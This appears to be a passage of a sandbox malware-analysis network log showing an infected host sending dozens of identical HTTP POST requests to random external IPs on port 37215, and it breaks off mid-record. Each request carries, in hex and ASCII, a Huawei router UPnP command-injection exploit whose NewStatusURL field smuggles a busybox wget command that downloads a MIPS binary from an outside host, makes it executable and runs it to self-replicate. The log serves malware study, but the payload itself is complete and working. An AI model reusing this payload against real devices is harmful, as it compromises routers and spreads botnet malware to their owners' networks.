                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1824192.168.2.154381418.114.86.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.978977919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1825192.168.2.1534352197.35.179.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979351997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1826192.168.2.1543754167.68.254.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979360104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1827192.168.2.1552746157.171.223.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979382992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1828192.168.2.155325241.64.51.10237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979401112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1829192.168.2.153771031.177.4.11837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979428053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1830192.168.2.1538974187.239.248.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979443073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1831192.168.2.1545304143.135.77.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979455948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1832192.168.2.1537984150.161.158.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979477882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1833192.168.2.1539844157.145.41.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979494095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
